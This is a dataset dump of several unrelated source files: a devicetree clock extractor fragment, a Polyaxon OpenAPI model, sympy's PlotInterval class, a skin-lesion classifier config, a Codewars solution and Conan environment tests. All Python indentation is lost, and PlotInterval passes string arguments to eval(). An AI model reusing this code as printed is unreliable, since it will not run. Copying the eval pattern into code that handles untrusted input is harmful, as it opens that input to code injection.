clock_cell_name = 'CLOCKS_CONTROLLER'
else:
clock_cell_name = 'CLOCK_CONTROLLER'
if clock_index == 0 and \
len(clocks) == (len(clock_cells) + 1):
index = ''
else:
index = str(clock_index)
clock_label = self.get_label_string([clock_consumer_label,
clock_cell_name,
index])
prop_def[clock_label] = '"' + clock_provider_label_str + '"'
if node_address in aliases:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cell_name,
index]),
clock_label,
prop_alias)
insert_defs(node_address, prop_def, prop_alias)
clock_cell_index = 0
clock_index += 1
##
# @brief Extract clocks related directives
#
# @param node_address Address of node owning the clockxxx definition.
# @param yaml YAML definition for the owning node.
# @param prop clockxxx property name
# @param def_label Define label string of node owning the directive.
#
def extract(self, node_address, yaml, prop, def_label):
properties = reduced[node_address]['props'][prop]
prop_list = []
if not isinstance(properties, list):
prop_list.append(properties)
else:
prop_list = list(properties)
if prop == 'clocks':
# indicator for clock consumers
self._extract_consumer(node_address, yaml, prop_list, def_label)
else:
raise Exception(
"DTClocks.extract called with unexpected directive ({})."
.format(prop))
##
# @brief Management information for clocks.
clocks = DTClocks()
|
the-stack_106_12928
|
#!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.0.79
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from polyaxon_sdk.configuration import Configuration
class V1SparkReplica(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"replicas": "int",
"environment": "V1Environment",
"init": "list[V1Init]",
"sidecars": "list[V1Container]",
"container": "V1Container",
}
attribute_map = {
"replicas": "replicas",
"environment": "environment",
"init": "init",
"sidecars": "sidecars",
"container": "container",
}
def __init__(
self,
replicas=None,
environment=None,
init=None,
sidecars=None,
container=None,
local_vars_configuration=None,
): # noqa: E501
"""V1SparkReplica - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._replicas = None
self._environment = None
self._init = None
self._sidecars = None
self._container = None
self.discriminator = None
if replicas is not None:
self.replicas = replicas
if environment is not None:
self.environment = environment
if init is not None:
self.init = init
if sidecars is not None:
self.sidecars = sidecars
if container is not None:
self.container = container
@property
def replicas(self):
"""Gets the replicas of this V1SparkReplica. # noqa: E501
:return: The replicas of this V1SparkReplica. # noqa: E501
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""Sets the replicas of this V1SparkReplica.
:param replicas: The replicas of this V1SparkReplica. # noqa: E501
:type: int
"""
self._replicas = replicas
@property
def environment(self):
"""Gets the environment of this V1SparkReplica. # noqa: E501
:return: The environment of this V1SparkReplica. # noqa: E501
:rtype: V1Environment
"""
return self._environment
@environment.setter
def environment(self, environment):
"""Sets the environment of this V1SparkReplica.
:param environment: The environment of this V1SparkReplica. # noqa: E501
:type: V1Environment
"""
self._environment = environment
@property
def init(self):
"""Gets the init of this V1SparkReplica. # noqa: E501
:return: The init of this V1SparkReplica. # noqa: E501
:rtype: list[V1Init]
"""
return self._init
@init.setter
def init(self, init):
"""Sets the init of this V1SparkReplica.
:param init: The init of this V1SparkReplica. # noqa: E501
:type: list[V1Init]
"""
self._init = init
@property
def sidecars(self):
"""Gets the sidecars of this V1SparkReplica. # noqa: E501
:return: The sidecars of this V1SparkReplica. # noqa: E501
:rtype: list[V1Container]
"""
return self._sidecars
@sidecars.setter
def sidecars(self, sidecars):
"""Sets the sidecars of this V1SparkReplica.
:param sidecars: The sidecars of this V1SparkReplica. # noqa: E501
:type: list[V1Container]
"""
self._sidecars = sidecars
@property
def container(self):
"""Gets the container of this V1SparkReplica. # noqa: E501
:return: The container of this V1SparkReplica. # noqa: E501
:rtype: V1Container
"""
return self._container
@container.setter
def container(self, container):
"""Sets the container of this V1SparkReplica.
:param container: The container of this V1SparkReplica. # noqa: E501
:type: V1Container
"""
self._container = container
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1SparkReplica):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1SparkReplica):
return True
return self.to_dict() != other.to_dict()
|
the-stack_106_12929
|
from __future__ import print_function, division
from sympy import Symbol, sympify
from sympy.core.numbers import Integer
class PlotInterval(object):
"""
"""
_v, _v_min, _v_max, _v_steps = None, None, None, None
def require_all_args(f):
def check(self, *args, **kwargs):
for g in [self._v, self._v_min, self._v_max, self._v_steps]:
if g is None:
raise ValueError("PlotInterval is incomplete.")
return f(self, *args, **kwargs)
return check
def __init__(self, *args):
if len(args) == 1:
if isinstance(args[0], PlotInterval):
self.fill_from(args[0])
return
elif isinstance(args[0], str):
try:
args = eval(args[0])
except TypeError:
s_eval_error = "Could not interpret string %s."
raise ValueError(s_eval_error % (args[0]))
elif isinstance(args[0], (tuple, list)):
args = args[0]
else:
raise ValueError("Not an interval.")
if not isinstance(args, (tuple, list)) or len(args) > 4:
f_error = "PlotInterval must be a tuple or list of length 4 or less."
raise ValueError(f_error)
args = list(args)
if len(args) > 0 and (args[0] is None or isinstance(args[0], Symbol)):
self.v = args.pop(0)
if len(args) in [2, 3]:
self.v_min = args.pop(0)
self.v_max = args.pop(0)
if len(args) == 1:
self.v_steps = args.pop(0)
elif len(args) == 1:
self.v_steps = args.pop(0)
def get_v(self):
return self._v
def set_v(self, v):
if v is None:
self._v = None
return
if not isinstance(v, Symbol):
raise ValueError("v must be a sympy Symbol.")
self._v = v
def get_v_min(self):
return self._v_min
def set_v_min(self, v_min):
if v_min is None:
self._v_min = None
return
try:
self._v_min = sympify(v_min)
float(self._v_min.evalf())
except TypeError:
raise ValueError("v_min could not be interpreted as a number.")
def get_v_max(self):
return self._v_max
def set_v_max(self, v_max):
if v_max is None:
self._v_max = None
return
try:
self._v_max = sympify(v_max)
float(self._v_max.evalf())
except TypeError:
raise ValueError("v_max could not be interpreted as a number.")
def get_v_steps(self):
return self._v_steps
def set_v_steps(self, v_steps):
if v_steps is None:
self._v_steps = None
return
if isinstance(v_steps, int):
v_steps = Integer(v_steps)
elif not isinstance(v_steps, Integer):
raise ValueError("v_steps must be an int or sympy Integer.")
if v_steps <= Integer(0):
raise ValueError("v_steps must be positive.")
self._v_steps = v_steps
@require_all_args
def get_v_len(self):
return self.v_steps + 1
v = property(get_v, set_v)
v_min = property(get_v_min, set_v_min)
v_max = property(get_v_max, set_v_max)
v_steps = property(get_v_steps, set_v_steps)
v_len = property(get_v_len)
def fill_from(self, b):
if b.v is not None:
self.v = b.v
if b.v_min is not None:
self.v_min = b.v_min
if b.v_max is not None:
self.v_max = b.v_max
if b.v_steps is not None:
self.v_steps = b.v_steps
@staticmethod
def try_parse(*args):
"""
Returns a PlotInterval if args can be interpreted
as such, otherwise None.
"""
if len(args) == 1 and isinstance(args[0], PlotInterval):
return args[0]
try:
return PlotInterval(*args)
except ValueError:
return None
def _str_base(self):
return ",".join(
[str(self.v), str(self.v_min), str(self.v_max), str(self.v_steps)]
)
def __repr__(self):
"""
A string representing the interval in class constructor form.
"""
return "PlotInterval(%s)" % (self._str_base())
def __str__(self):
"""
A string representing the interval in list form.
"""
return "[%s]" % (self._str_base())
@require_all_args
def assert_complete(self):
pass
@require_all_args
def vrange(self):
"""
Yields v_steps+1 sympy numbers ranging from
v_min to v_max.
"""
d = (self.v_max - self.v_min) / self.v_steps
for i in range(self.v_steps + 1):
a = self.v_min + (d * Integer(i))
yield a
@require_all_args
def vrange2(self):
"""
Yields v_steps pairs of sympy numbers ranging from
(v_min, v_min + step) to (v_max - step, v_max).
"""
d = (self.v_max - self.v_min) / self.v_steps
a = self.v_min + (d * Integer(0))
for i in range(self.v_steps):
b = self.v_min + (d * Integer(i + 1))
yield a, b
a = b
def frange(self):
for i in self.vrange():
yield float(i.evalf())
|
the-stack_106_12932
|
import numpy as np
def init(mdlParams_):
mdlParams = {}
# Save summaries and model here
mdlParams['saveDir'] = './models/model_ham_effb1_binary'
mdlParams['model_load_path'] = ''
# Data is loaded from here
mdlParams['dataDir'] = './Data'
mdlParams['with_meta'] = False
mdlParams['meta_path'] = './ham_meta.pkl'
### Model Selection ###
mdlParams['model_type'] = 'efficientnet-b1'
mdlParams['numClasses'] = 2
mdlParams['balance_classes'] = 2
mdlParams['numOut'] = mdlParams['numClasses']
# Scale up for b1-b7
mdlParams['crop_size'] = [280, 280]
mdlParams['input_size'] = [240, 240, 3]
mdlParams['focal_loss'] = True
### Training Parameters ###
# Batch size
mdlParams['batchSize'] = 20 # *len(mdlParams['numGPUs'])
# Initial learning rate
mdlParams['learning_rate'] = 0.000015 # *len(mdlParams['numGPUs'])
# Lower learning rate after no improvement over 100 epochs
mdlParams['lowerLRAfter'] = 25
# If there is no validation set, start lowering the LR after X steps
mdlParams['lowerLRat'] = 50
# Divide learning rate by this value
mdlParams['LRstep'] = 5
# Maximum number of training iterations
mdlParams['training_steps'] = 60
# Display error every X steps
mdlParams['display_step'] = 2
# Scale?
mdlParams['scale_targets'] = False
# Peak at test error during training? (generally, dont do this!)
mdlParams['peak_at_testerr'] = False
# Print trainerr
mdlParams['print_trainerr'] = False
# Subtract trainset mean?
mdlParams['subtract_set_mean'] = False
mdlParams['setMean'] = np.array([0.0, 0.0, 0.0])
mdlParams['setStd'] = np.array([1.0, 1.0, 1.0])
# Cross validation
mdlParams['fold'] = 5
# Data AUG
# mdlParams['full_color_distort'] = True
mdlParams['autoaugment'] = False
mdlParams['flip_lr_ud'] = True
mdlParams['full_rot'] = 180
mdlParams['scale'] = (0.8, 1.2)
mdlParams['shear'] = 10
mdlParams['cutout'] = 16
mdlParams['only_downsmaple'] = False
# Meta settings
mdlParams['meta_features'] = ['age_0.0', 'age_5.0',
'age_10.0', 'age_15.0', 'age_20.0', 'age_25.0', 'age_30.0', 'age_35.0',
'age_40.0', 'age_45.0', 'age_50.0', 'age_55.0', 'age_60.0', 'age_65.0',
'age_70.0', 'age_75.0', 'age_80.0', 'age_85.0', 'sex_female',
'sex_male', 'sex_unknown', 'localization_abdomen', 'localization_acral',
'localization_back', 'localization_chest', 'localization_ear',
'localization_face', 'localization_foot', 'localization_genital',
'localization_hand', 'localization_lower extremity',
'localization_neck', 'localization_scalp', 'localization_trunk',
'localization_unknown', 'localization_upper extremity']
mdlParams['fc_layers_before'] = [256, 256]
# Factor for scaling up the FC layer
scale_up_with_larger_b = 1.0
mdlParams['fc_layers_after'] = [int(1024 * scale_up_with_larger_b)]
mdlParams['freeze_cnn'] = False
mdlParams['learning_rate_meta'] = 0.00001
# Normal dropout in fc layers
mdlParams['dropout_meta'] = 0.4
return mdlParams
|
the-stack_106_12935
|
# https://www.codewars.com/kata/how-good-are-you-really
def better_than_average(class_points, your_points):
counter = 0
sum = 0
output = True
for i in class_points:
sum += i
counter += 1
if sum / counter >= your_points:
output = False
return output
|
the-stack_106_12937
|
import os
import platform
import unittest
from nose.plugins.attrib import attr
from conans.client import tools
from conans.client.generators.text import TXTGenerator
from conans.model.info import ConanInfo
from conans.model.ref import ConanFileReference, PackageReference
from conans.paths import BUILD_INFO, CONANFILE, CONANINFO
from conans.test.utils.cpp_test_files import cpp_hello_conan_files
from conans.test.utils.tools import TestClient
from conans.util.files import load
class ConanEnvTest(unittest.TestCase):
@attr('slow')
def shared_in_current_directory_test(self):
"""
- There is a package building a shared library
- There is a consumer project importing the shared library (and the executable)
- The consumer tries to execute the imported shared library and executable in the same
directory, and it fails in Linux, but works on OSX and WIndows.
- Then I move the shared library to a different directory, and it fails,
I'm making sure that there is no harcoded rpaths messing.
- Finally I use the virtualrunenvironment that declares de LD_LIBRARY_PATH,
PATH and DYLD_LIBRARY_PATH to run the executable, and.. magic!
it's running agains the shared in the local cache.
"""
conanfile = """
from conans import ConanFile, CMake, tools
class LibConan(ConanFile):
name = "lib"
version = "1.0"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=True"
generators = "cmake"
exports_sources = "*"
def build(self):
cmake = CMake(self)
self.run('cmake %s' % cmake.command_line)
self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="hello")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*main*", dst="bin", keep_path=False)
"""
cmakelists = """
set(CMAKE_CXX_COMPILER_WORKS 1)
set(CMAKE_CXX_ABI_COMPILED 1)
project(mytest)
SET(CMAKE_SKIP_RPATH 1)
ADD_LIBRARY(hello SHARED hello.c)
ADD_EXECUTABLE(main main.c)
TARGET_LINK_LIBRARIES(main hello)
"""
hello_h = """#pragma once
#ifdef WIN32
#define HELLO_EXPORT __declspec(dllexport)
#else
#define HELLO_EXPORT
#endif
HELLO_EXPORT void hello();
"""
client = TestClient()
files = {CONANFILE: conanfile,
"CMakeLists.txt": cmakelists,
"hello.c": '#include "hello.h"\nvoid hello(){\nreturn;}',
"hello.h": hello_h,
"main.c": '#include "hello.h"\nint main(){\nhello();\nreturn 0;\n}'}
client.save(files)
client.run("export . conan/stable")
client.run("install lib/1.0@conan/stable -o lib:shared=True --build missing")
client.save({"conanfile.txt": '''
[requires]
lib/1.0@conan/stable
[generators]
virtualrunenv
[imports]
bin, * -> ./bin
lib, * -> ./bin
'''}, clean_first=True)
client.run("install .")
# Break possible rpaths built in the exe with absolute paths
os.rename(os.path.join(client.current_folder, "bin"),
os.path.join(client.current_folder, "bin2"))
with tools.chdir(os.path.join(client.current_folder, "bin2")):
if platform.system() == "Windows":
self.assertEqual(os.system("main.exe"), 0)
elif platform.system() == "Darwin":
self.assertEqual(os.system("./main"), 0)
else:
self.assertNotEqual(os.system("./main"), 0)
self.assertEqual(os.system("LD_LIBRARY_PATH=$(pwd) ./main"), 0)
self.assertEqual(os.system("LD_LIBRARY_PATH=. ./main"), 0)
# If we move the shared library it won't work, at least we use the virtualrunenv
os.mkdir(os.path.join(client.current_folder, "bin2", "subdir"))
name = {"Darwin": "libhello.dylib",
"Windows": "hello.dll"}.get(platform.system(), "libhello.so")
os.rename(os.path.join(client.current_folder, "bin2", name),
os.path.join(client.current_folder, "bin2", "subdir", name))
if platform.system() == "Windows":
self.assertNotEqual(os.system("main.exe"), 0)
elif platform.system() == "Darwin":
self.assertNotEqual(os.system("./main"), 0)
else:
self.assertNotEqual(os.system("LD_LIBRARY_PATH=$(pwd) ./main"), 0)
# Will use the shared from the local cache
if platform.system() != "Windows":
command = "bash -c 'source ../activate_run.sh && ./main'"
else:
command = "cd .. && activate_run.bat && cd bin2 && main.exe"
self.assertEqual(os.system(command), 0)
def test_package_env_working(self):
client = TestClient()
conanfile = """from conans import ConanFile
class MyPkg(ConanFile):
name = "Pkg"
version = "0.1"
"""
test_conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Pkg/0.1@lasote/testing"
def build(self):
self.output.warn('MYVAR==>%s' % os.environ.get('MYVAR', ""))
def test(self):
pass
"""
client.save({"conanfile.py": conanfile,
"test_package/conanfile.py": test_conanfile})
client.run("create . lasote/testing -e MYVAR=MYVALUE")
self.assertIn("MYVAR==>MYVALUE", client.out)
def deactivate_env_inheritance_test(self):
client = TestClient()
conanfile = """from conans import ConanFile
class MyPkg(ConanFile):
def package_info(self):
self.env_info.SOME_VAR.append("22")
"""
client.save({"conanfile.py": conanfile})
client.run("create . Pkg/0.1@lasote/testing")
conanfile = """from conans import ConanFile
import os
class MyLib(ConanFile):
apply_env = False
requires = "Pkg/0.1@lasote/testing"
def _test(self):
assert("SOME_VAR" not in os.environ)
assert(self.deps_env_info["Pkg"].SOME_VAR == ["22"])
def build(self):
self._test()
def package(self):
self._test()
def package_info(self):
self._test()
def build(self):
self._test()
def imports(self):
self._test()
"""
client.save({"conanfile.py": conanfile})
client.run("create . MyLib/0.1@lasote/testing")
# Now as a build require, should be the same
client.save({"conanfile.py": conanfile.replace("requires =", "#requires ="),
"myprofile": "[build_requires]\nPkg/0.1@lasote/testing"})
client.run("create . MyLib/0.1@lasote/testing --profile ./myprofile")
def env_path_order_test(self):
client = TestClient()
with tools.environment_append({"SOME_VAR": ["INITIAL VALUE"]}):
conanfile = """from conans import ConanFile
import os
class MyPkg(ConanFile):
def build(self):
self.output.info("PKG VARS: %s" % os.getenv("SOME_VAR"))
def package_info(self):
self.env_info.SOME_VAR.append("OTHER_VALUE")
"""
client.save({"conanfile.py": conanfile})
client.run("create . Pkg/0.1@lasote/testing")
self.assertIn("Pkg/0.1@lasote/testing: PKG VARS: INITIAL VALUE", client.out)
conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Pkg/0.1@lasote/testing"
def build(self):
self.output.info("TEST VARS: %s" % os.getenv("SOME_VAR"))
def package_info(self):
self.env_info.SOME_VAR.extend(["OTHER_VALUE2", "OTHER_VALUE3"])
"""
client.save({"conanfile.py": conanfile})
client.run("create . Test/0.1@lasote/testing")
# FIXME: Note that these values are os.pathsep (; or :)
self.assertIn("Test/0.1@lasote/testing: TEST VARS: OTHER_VALUE%sINITIAL VALUE"
% os.pathsep,
client.out)
conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Test/0.1@lasote/testing"
def build(self):
self.output.info("PROJECT VARS: %s" % os.getenv("SOME_VAR"))
"""
client.save({"conanfile.py": conanfile})
client.run("create . project/0.1@lasote/testing")
self.assertIn("project/0.1@lasote/testing: PROJECT VARS: " +
os.pathsep.join(["OTHER_VALUE2", "OTHER_VALUE3",
"OTHER_VALUE", "INITIAL VALUE"]),
client.out)
client.run("create . project/0.1@lasote/testing -e SOME_VAR=[WHAT]")
self.assertIn("project/0.1@lasote/testing: PROJECT VARS: " +
os.pathsep.join(["WHAT", "OTHER_VALUE2", "OTHER_VALUE3",
"OTHER_VALUE", "INITIAL VALUE"]),
client.out)
def test_run_env(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
from conans.tools import mkdir
import os
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
build_policy = "missing"
def package_info(self):
mkdir(os.path.join(self.package_folder, "bin2"))
mkdir(os.path.join(self.package_folder, "lib2"))
self.cpp_info.bindirs.append("bin2")
self.cpp_info.libdirs.append("lib2")
'''
client.save({"conanfile.py": conanfile})
client.run("export . lasote/stable")
reuse = '''[requires]
Hello/0.1@lasote/stable
[generators]
virtualrunenv
'''
client.save({"conanfile.txt": reuse}, clean_first=True)
client.run("install .")
ext = "bat" if platform.system() == "Windows" else "sh"
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "activate_run.%s" % ext)))
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "deactivate_run.%s" % ext)))
environment_contents = client.load("environment_run.%s.env" % ext)
self.assertIn("PATH", environment_contents)
self.assertIn("LD_LIBRARY_PATH", environment_contents)
self.assertIn("DYLD_LIBRARY_PATH", environment_contents)
for line in environment_contents.splitlines():
if " PATH=" in line:
self.assertIn("bin2", line)
self.assertNotIn("lib2", line)
if " DYLD_LIBRARY_PATH=" in line:
self.assertNotIn("bin2", line)
self.assertIn("lib2", line)
if " LD_LIBRARY_PATH=" in line:
self.assertNotIn("bin2", line)
self.assertIn("lib2", line)
def dual_compiler_settings_and_env_test(self):
def patch_conanfile(conanfile):
return conanfile + '''
def build(self):
import os
self.output.warn("COMPILER: %s=>%s" % (self.name, self.settings.compiler))
self.output.warn("CXX: %s=>%s" % (self.name, os.environ["CXX"]))
self.output.warn("CC: %s=>%s" % (self.name, os.environ["CC"]))
'''
client = TestClient()
files = cpp_hello_conan_files("Hello0", "1.0", deps=[], build=False)
files[CONANFILE] = patch_conanfile(files[CONANFILE])
client.save(files)
client.run("export . lasote/stable")
files = cpp_hello_conan_files("Hello1", "1.0",
deps=["Hello0/1.0@lasote/stable"], build=False)
files[CONANFILE] = patch_conanfile(files[CONANFILE])
client.save(files)
client.run("export . lasote/stable")
# Both with same settings
client.run("install Hello1/1.0@lasote/stable --build -s compiler=gcc"
" -s compiler.version=4.6 -s compiler.libcxx=libstdc++11"
" -e CXX=/mycompilercxx -e CC=/mycompilercc")
self.assertIn("COMPILER: Hello0=>gcc", client.out)
self.assertIn("CXX: Hello0=>/mycompilercxx", client.out)
self.assertIn("CC: Hello0=>/mycompilercc", client.out)
self.assertIn("COMPILER: Hello1=>gcc", client.out)
self.assertIn("CXX: Hello1=>/mycompilercxx", client.out)
self.assertIn("CC: Hello1=>/mycompilercc", client.out)
# Different for Hello0
client.run("install Hello1/1.0@lasote/stable --build -s compiler=gcc"
" -s compiler.version=4.6 -s compiler.libcxx=libstdc++11"
" -e CXX=/mycompilercxx -e CC=/mycompilercc"
" -s Hello0:compiler=clang -s Hello0:compiler.version=3.7"
" -s Hello0:compiler.libcxx=libstdc++"
" -e Hello0:CXX=/othercompilercxx -e Hello0:CC=/othercompilercc")
self.assertIn("COMPILER: Hello0=>clang", client.out)
self.assertIn("CXX: Hello0=>/othercompilercxx", client.out)
self.assertIn("CC: Hello0=>/othercompilercc", client.out)
self.assertIn("COMPILER: Hello1=>gcc", client.out)
self.assertIn("CXX: Hello1=>/mycompilercxx", client.out)
self.assertIn("CC: Hello1=>/mycompilercc", client.out)
def conan_profile_unscaped_env_var_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
'''
files = {"conanfile.py": conanfile}
client.save(files)
client.run("export . lasote/stable")
reuse = '''
[requires]
Hello/0.1@lasote/stable
[generators]
virtualenv
'''
profile = '''
[env]
CXXFLAGS=-fPIC -DPIC
'''
files = {"conanfile.txt": reuse, "myprofile": profile}
client.save(files, clean_first=True)
client.run("install . --profile ./myprofile --build missing")
with tools.chdir(client.current_folder):
if platform.system() != "Windows":
ret = os.system("chmod +x activate.sh && ./activate.sh")
else:
ret = os.system("activate.bat")
self.assertEqual(ret, 0)
def conan_env_deps_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
def package_info(self):
self.env_info.var1="bad value"
self.env_info.var2.append("value2")
self.env_info.var3="Another value"
self.env_info.path = "/dir"
'''
files = {"conanfile.py": conanfile}
client.save(files)
client.run("export . lasote/stable")
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello2"
version = "0.1"
def config(self):
self.requires("Hello/0.1@lasote/stable")
def package_info(self):
self.env_info.var1="good value"
self.env_info.var2.append("value3")
self.env_info.CPPFLAGS.append("MYCPPFLAG=1")
'''
files["conanfile.py"] = conanfile
client.save(files, clean_first=True)
client.run("export . lasote/stable")
client.run("install Hello2/0.1@lasote/stable --build "
"-g virtualenv -e CPPFLAGS=[OtherFlag=2]")
ext = "bat" if platform.system() == "Windows" else "sh"
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "activate.%s" % ext)))
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "deactivate.%s" % ext)))
environment_contents = client.load("environment.%s.env" % ext)
deactivate_contents = client.load("deactivate.%s" % ext)
self.assertNotIn("bad value", environment_contents)
if platform.system() == "Windows":
self.assertIn("var1=good value", environment_contents)
else:
self.assertIn('var1="good value"', environment_contents)
if platform.system() == "Windows":
self.assertIn('var2=value3;value2;%var2%', environment_contents)
else:
self.assertIn('var2="value3":"value2"${var2+:$var2}', environment_contents)
self.assertIn('CPPFLAGS="OtherFlag=2 MYCPPFLAG=1 ${CPPFLAGS+ $CPPFLAGS}"',
environment_contents)
self.assertIn("Another value", environment_contents)
if platform.system() == "Windows":
self.assertIn("PATH=/dir", environment_contents)
else:
self.assertIn("PATH=\"/dir\"", environment_contents)
if platform.system() == "Windows":
self.assertIn('var1=', deactivate_contents)
self.assertIn('var2=', deactivate_contents)
else:
self.assertIn('unset var1', deactivate_contents)
self.assertIn('unset var2', deactivate_contents)
def test_conan_info_cache_and_priority(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
def package_info(self):
self.env_info.VAR1="99"
'''
reuse = '''
import os
from conans import ConanFile
class Hello2Conan(ConanFile):
requires="Hello/0.1@lasote/stable"
def build(self):
self.output.info("VAR1=>%s" % os.environ.get("VAR1"))
'''
files = dict()
files["conanfile.py"] = conanfile
client.save(files)
client.run("export . lasote/stable")
files = dict()
files["conanfile.py"] = reuse
client.save(files)
client.run("install . --build missing")
client.run("build .")
self.assertIn("VAR1=>99", client.out)
# Now specify a different value in command Line, but conaninfo already exists
# So you cannot override it from command line without deleting the conaninfo.TXTGenerator
client.run("install . -e VAR1=100 --build missing")
client.run("build .")
self.assertIn("VAR1=>100", client.out)
# Remove conaninfo
os.remove(os.path.join(client.current_folder, CONANINFO))
client.run("install . -e VAR1=100 --build missing")
client.run("build .")
self.assertIn("VAR1=>100", client.out)
# Now from a profile
os.remove(os.path.join(client.current_folder, CONANINFO))
client.save({"myprofile": "[env]\nVAR1=102"}, clean_first=False)
client.run("install . --profile ./myprofile --build missing")
client.run("build .")
self.assertIn("VAR1=>102", client.out)
def test_complex_deps_propagation(self):
client = TestClient()
self._export(client, "A", [], {"VAR1": "900", "VAR2": "23"})
self._export(client, "B1", ["A"], {"VAR1": "800", "VAR2": "24"})
self._export(client, "B2", ["A"], {"VAR1": "700", "VAR3": "22"})
self._export(client, "C", ["B1", "B2"], {})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertIn("VAR1=>800*", client.out)
self.assertIn("VAR2=>24*", client.out)
self.assertIn("VAR3=>22*", client.out)
def assertInSep(self, string, output):
string = string.replace(":", os.pathsep)
self.assertIn(string, output)
def replace_sep(self, string):
return string.replace(":", os.pathsep)
def test_complex_deps_propagation_append(self):
client = TestClient()
self._export(client, "A", [], {"VAR3": "-23"}, {"VAR1": "900", "VAR2": "23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "45"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertInSep("VAR1=>700:800:900*" % {"sep": os.pathsep}, client.out)
self.assertInSep("VAR2=>24:23*" % {"sep": os.pathsep}, client.out)
self.assertInSep("VAR3=>45*", client.out)
# Try other configuration
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "23"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertInSep("VAR1=>700:800:900*", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>23*", client.out)
# Try injecting some ENV in the install
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "23"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e VAR1=[override] -e VAR3=SIMPLE")
client.run("build .")
self.assertInSep("VAR1=>override:700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertIn("VAR3=>SIMPLE*", client.out)
def test_override_simple(self):
client = TestClient()
# Try injecting some package level ENV in the install
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_A:VAR3=override")
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertIn("VAR3=>-23*", client.out)
def test_override_simple2(self):
client = TestClient()
# Try injecting some package level ENV in the install
self._export(client, "A", [], {"VAR3": "-23"}, {"VAR1": "900", "VAR2": "23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e VAR3=override")
self.assertIn("Building LIB_A, VAR1:None", client.out)
self.assertIn("Building LIB_A, VAR2:None", client.out)
self.assertIn("Building LIB_A, VAR3:override", client.out)
self.assertIn("Building LIB_B, VAR1:900", client.out)
